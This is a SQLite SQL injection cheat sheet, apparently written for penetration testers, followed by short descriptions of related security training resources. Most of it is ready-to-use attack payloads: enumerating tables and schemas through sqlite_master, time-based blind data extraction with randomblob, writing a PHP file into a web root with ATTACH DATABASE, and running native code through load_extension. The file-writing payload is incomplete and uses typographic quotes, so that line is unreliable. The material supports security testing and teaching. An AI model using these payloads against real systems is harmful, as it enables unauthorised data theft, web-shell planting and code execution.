SQLite SQL Injection Cheat Sheet

If you need: You use

Concatenation: ||

Comments: --

Conditionals: CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse'

Substring: substr(string,start,stop)

Length: length(string)

Quotes without literal quotes: cast(X'27' as text) --use X'22' for double quotes

Table name enumeration: SELECT name FROM sqlite_master WHERE type='table'

Table schema enumeration: SELECT sql FROM sqlite_master WHERE type='table'

Time-based data extraction: cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true'

File writing: 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled

Arbitrary Code Execution: load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

ALTERNATIVES

Markdown version of OWASP Testing Checklist v4 for various platforms.

The best security training environment for Developers and AppSec Professionals.

A weekly newsletter providing cybersecurity leadership insights, industry updates, and strategic guidance for security professionals advancing to management positions.

A comprehensive guide to memory forensics, covering tools, techniques, and procedures for analyzing volatile memory.

A game packed with real-life examples of how not to store secrets in software, with 46 challenges to solve.

A project developed for pentesters to practice SQL Injection concepts in a controlled environment.

A comprehensive guide to mobile application penetration testing, covering various topics and techniques.

Practical security handbook for .NET developers.